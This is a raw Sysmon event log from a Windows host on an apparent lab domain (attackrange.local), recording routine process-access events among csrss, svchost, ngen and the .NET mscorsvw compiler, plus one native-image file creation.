13:49:59.854{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:59.854{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:59.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9207-6005-7703-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.682{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9207-6005-7703-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:59.682{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9207-6005-7703-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:59.651{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9207-6005-7603-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:59.635{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9207-6005-7603-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:59.635{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9207-6005-7603-00000000A301}648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.979{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9208-6005-7B03-00000000A301}1188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 
10341000x80000000000000007816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.979{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9208-6005-7B03-00000000A301}1188C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:00.885{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9208-6005-7A03-00000000A301}3800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.869{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9208-6005-7A03-00000000A301}3800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007813Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:00.869{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9208-6005-7A03-00000000A301}3800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007812Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:00.822{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9208-6005-7903-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007811Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:00.807{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9208-6005-7903-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:00.807{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9208-6005-7903-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:00.713{59A5CD1D-9207-6005-7803-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b04-0\Microsoft.CSharp.dll2021-01-18 13:50:00.713 10341000x80000000000000007830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:01.479{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.463{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:01.463{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9209-6005-7E03-00000000A301}4732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:01.400{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9209-6005-7D03-00000000A301}864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:01.385{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9209-6005-7D03-00000000A301}864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:01.385{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9209-6005-7D03-00000000A301}864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:01.104{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 